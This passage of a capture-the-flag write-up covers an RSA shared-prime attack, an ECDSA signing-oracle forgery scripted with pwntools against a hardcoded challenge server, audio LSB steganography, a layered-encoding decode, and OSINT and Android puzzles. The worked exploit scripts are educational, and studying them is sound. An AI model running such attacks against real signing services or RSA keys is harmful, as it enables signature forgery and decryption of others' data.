Running the script confirmed the shared prime, factored n1 completely, computed the private key, and decrypted the ciphertext to recover the flag.
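The same attack runs end to end with toy primes (values chosen purely for illustration):

```python
import math

p, q1, q2 = 61, 53, 59          # p is reused across both key pairs
n1, n2 = p * q1, p * q2
e = 17
m = 42                          # toy "message"
c = pow(m, e, n1)

shared = math.gcd(n1, n2)       # recovers p instantly
assert shared == p
phi = (shared - 1) * (n1 // shared - 1)
d = pow(e, -1, phi)             # modular inverse (Python 3.8+)
print(pow(c, d, n1))            # decrypts back to 42
```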
Key Takeaways
- Never reuse prime factors across different RSA key pairs — gcd(n1, n2) > 1 breaks both instantly
- This attack requires only basic arithmetic — no factoring algorithms needed if a shared prime exists
- Weak or seeded PRNGs in key generation are a real-world threat to RSA deployments
- Python 3.8+ pow(e, -1, n) computes the modular inverse directly
Signing Oracle — Cryptography (Hard, 500 pts)
Overview
An ECDSA signing oracle running on secp256k1. The service exposed four commands: PUBKEY, SIGN, VERIFY, and FLAG. The goal was to produce a valid ECDSA signature over the SHA-256 hash of the string 'give_me_the_flag'. The expected hash was:
5c85da92bbff10629271762403f3ecd8b64022380d39ff3cfc8703930d2d72ac
Initial Analysis
Our first instinct was biased nonces or nonce reuse — two well-known ECDSA attack classes. We collected 200 signatures and analyzed the r-value bit lengths. The average was 255.1 bits, consistent with truly random nonces. No nonce reuse was detected. The actual vulnerability was simpler.
Root Cause — Direct Hash Signing
The SIGN command accepted a hex-encoded message and signed it. The critical flaw: the server signed the provided hex value directly as the message hash, without applying any internal hashing first. This meant if we sent the challenge hash to SIGN, the oracle would produce a valid ECDSA signature over exactly that value — which is precisely what FLAG required.
Exploit
A short scripted solve using pwntools:
from pwn import *
import time
CHASH = '5c85da92bbff10629271762403f3ecd8b64022380d39ff3cfc8703930d2d72ac'
io = remote('212.2.250.33', 30454)
time.sleep(1); io.recv(timeout=3)

# Step 1: Ask the oracle to sign the challenge hash
io.sendline(('SIGN ' + CHASH).encode())
time.sleep(1)
line = io.recv(timeout=3).decode().strip()
r, s = line.split()[0], line.split()[1]

# Step 2: Submit the signature for the flag
io.sendline(('FLAG ' + CHASH + ' ' + r + ' ' + s).encode())
time.sleep(2)
print(io.recv(timeout=5).decode())
io.close()
Key Takeaways
- A signing oracle must hash user input internally — never accept arbitrary raw hash values
- This is the classical signing oracle attack: the oracle signs the exact challenge on the attacker's behalf
- When expected attacks (nonce reuse, lattice) show no signal, revisit the protocol logic itself
- ECDSA on secp256k1 is secure in theory; implementation flaws are where it breaks in practice
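A minimal sketch of the flaw and its fix, with the ECDSA primitive replaced by an identity stand-in (only which digest reaches the signer matters for this bug; the stand-in and both function names are ours, not the challenge server's):

```python
import hashlib

TARGET = hashlib.sha256(b'give_me_the_flag').digest()

# Stand-in for the raw ECDSA signing primitive: we model it as the
# identity function because the vulnerability is entirely about which
# digest the caller can get signed, not about the curve math.
def sign_raw(digest: bytes) -> bytes:
    return digest

def vulnerable_sign(user_hex: str) -> bytes:
    # Flawed design: the client-supplied hex IS the digest that gets signed.
    return sign_raw(bytes.fromhex(user_hex))

def safe_sign(user_msg: bytes) -> bytes:
    # Fixed design: the server hashes internally, so an attacker cannot
    # hand the oracle a pre-chosen digest.
    return sign_raw(hashlib.sha256(user_msg).digest())

# Sending the challenge hash itself forges a signature over TARGET:
assert vulnerable_sign(TARGET.hex()) == sign_raw(TARGET)
# The same input no longer yields a signature over TARGET:
assert safe_sign(TARGET.hex().encode()) != sign_raw(TARGET)
```

With internal hashing, getting TARGET signed would require submitting the literal string 'give_me_the_flag', which the server can refuse.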
Other Categories
Suspicious Transmission — Steganography (Medium, 300 pts)
Overview
A WAV audio file that sounded like an ordinary 440 Hz sine tone — nothing unusual on first listen. The challenge also provided the source code used to generate it, which turned this from a blind stego problem into a clean reversal exercise.
Reading the Source Code
The generation code revealed the exact embedding method:
Sample rate: 8000 Hz, Duration: 2s → 16,000 total samples
Flag converted to bits (with null terminator)
Each bit embedded into the LSB (Least Significant Bit) of each sample
Modifying only the last bit of a 16-bit sample changes the audio signal by a maximum of 1/32768 — completely inaudible. The file carried the hidden message the entire time.
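Based on that description, the embedding step can be sketched as follows. The bit order (MSB first) and null terminator mirror the extraction logic; the flat sample buffer is a synthetic stand-in for the real 440 Hz tone:

```python
def embed_lsb(samples, message: bytes):
    # Convert message bytes to bits, MSB first, with a null terminator
    # marking the end of the payload.
    bits = []
    for byte in message + b'\x00':
        bits += [(byte >> i) & 1 for i in range(7, -1, -1)]
    out = list(samples)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~1) | bit  # overwrite only the LSB of each sample
    return out

samples = [100] * 16000               # stand-in for the 16,000 sine samples
stego = embed_lsb(samples, b'flag{x}')
```

Each modified sample differs from the original by at most 1, which is why the carrier tone sounds untouched.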
Extraction
We reversed the process in Python: read the audio samples, extract the LSB from each, group the bits into bytes, and decode back to ASCII:
import wave, struct

with wave.open('challenge.wav', 'r') as wf:
    raw = wf.readframes(wf.getnframes())
samples = struct.unpack(f'<{len(raw)//2}h', raw)
bits = [s & 1 for s in samples]

chars = []
for i in range(0, len(bits) - 7, 8):
    byte = 0
    for b in bits[i:i+8]:
        byte = (byte << 1) | b
    if byte == 0:
        break
    chars.append(chr(byte))
print(''.join(chars))
Running the script decoded the hidden message and produced the flag.
Key Takeaways
- LSB steganography in audio is imperceptible because 1-bit changes are below human hearing thresholds
- Provided source code in a stego challenge is almost always the intended solve path — read it carefully
- The null terminator (8 zero bits) marks the message boundary in this embedding scheme
- Stego challenges often hide data across multiple media types: images, audio, and even network captures
The Encoding Onion — Other (Medium, 300 pts)
Overview
A multi-layer encoding challenge where a string had to be peeled back through six nested transformations to reveal the flag. The challenge description provided the layer order explicitly — the difficulty was in executing each step correctly and in sequence.
Layer Order (Outer to Inner)
Base64 → Base32 → Hex → ROT13 → Reverse → Base64
Step-by-Step Decode
We decoded each layer in sequence using a Python script:
import base64, codecs
encoded = 'R05TREdNQl...' # (full encoded string)
step1 = base64.b64decode(encoded) # Layer 1: Base64
step2 = base64.b32decode(step1) # Layer 2: Base32
step3 = bytes.fromhex(step2.decode()) # Layer 3: Hex
step4 = codecs.decode(step3.decode(), 'rot_13') # Layer 4: ROT13
step5 = step4[::-1] # Layer 5: Reverse
final = base64.b64decode(step5) # Layer 6: Base64
print(final.decode())
Common pitfalls here: Base32 decoding is strict about both case and padding, and ROT13 must be applied after hex decoding, not before. Swapping any two steps breaks the chain entirely. The final output yielded the flag.
Key Takeaways
- Multi-layer encoding challenges require strict ordering — document each output before proceeding
- ROT13 is symmetric, so codecs.decode with 'rot_13' handles both encode and decode
- Base32 decoding requires the input to be a bytes-like object — type handling in Python is critical here
- Scripting all layers together is faster and less error-prone than running each step manually
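A useful sanity check when scripting a chain like this is a round trip: re-encode a placeholder value inner-to-outer and confirm the decode chain inverts it. This sketch uses a made-up flag string; only the layer order comes from the challenge:

```python
import base64, codecs

def wrap(flag: str) -> str:
    # Apply the six layers inner-to-outer (reverse of the decode order).
    s = base64.b64encode(flag.encode()).decode()  # innermost Base64
    s = s[::-1]                                   # Reverse
    s = codecs.encode(s, 'rot_13')                # ROT13
    s = s.encode().hex()                          # Hex
    s = base64.b32encode(s.encode()).decode()     # Base32
    return base64.b64encode(s.encode()).decode()  # outermost Base64

def unwrap(encoded: str) -> str:
    # Peel the layers outer-to-inner, exactly as in the solve script.
    step1 = base64.b64decode(encoded)
    step2 = base64.b32decode(step1)
    step3 = bytes.fromhex(step2.decode())
    step4 = codecs.decode(step3.decode(), 'rot_13')
    step5 = step4[::-1]
    return base64.b64decode(step5).decode()

assert unwrap(wrap('FLAG{example}')) == 'FLAG{example}'
```

If the round trip fails, the layer order or a type conversion (str vs bytes) is wrong, which pinpoints the broken step immediately.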
Two Point Three Six Part 2 — OSINT (Easy, 50 pts)
Overview
An OSINT challenge referencing the 26/11 Mumbai attacks. The challenge asked for the approximate time at which Ajmal Kasab was captured, with the hint that commonly reported timelines contain inconsistencies.
Approach
General search results for '26/11 Kasab captured' returned broad summaries with vague timing references. The challenge hint — 'Nobody remembers the truth correctly' — pointed toward the need for detailed incident timelines rather than news summaries. We refined our search:
Search queries used:
'Ajmal Kasab capture exact time IST'
'Kasab arrested timeline 26/11 police report'
'26/11 Kasab capture time discrepancy'
Cross-referencing multiple detailed accounts and police chronologies narrowed the capture time to approximately 01:30 AM IST — shortly after midnight on 27 November 2008. The challenge specified an 'around time', confirming that a consistent approximation was the expected answer.
Flag format: [FLAG REDACTED] → [FLAG REDACTED]
Key Takeaways
- OSINT challenges about historical events require primary sources and detailed timelines, not Wikipedia summaries
- Cross-referencing multiple reports helps resolve timing discrepancies in conflicting accounts
- Always note the exact flag format requirement — time format (12hr vs 24hr, AM/PM) is critical
shinchi — Mobile (Medium, 250 pts)
Overview
A mobile challenge requiring Android APK analysis. The challenge name itself was the first clue.
Approach
The name 'shinchi' plays on 'shichi' (七), the Japanese word for 'seven'. That was the intended nudge. We sideloaded the APK onto a test device and explored the application.
The app featured a simple calculator-style interface. Entering 3 + 4 — which equals 7, the numerical meaning of shinchi — triggered a special output: a Base64-encoded string appeared on screen.
Input: 3 + 4 = 7
Output: <base64 encoded string>
Decode: base64 -d <string> → Flag
Decoding the Base64 output produced the flag directly.
Key Takeaways
- Mobile challenge names frequently encode the intended input — treat them as hints
- APK sideloading for analysis is a fundamental Android CTF technique
- Hidden functionality triggered by specific inputs is a common mobile challenge design pattern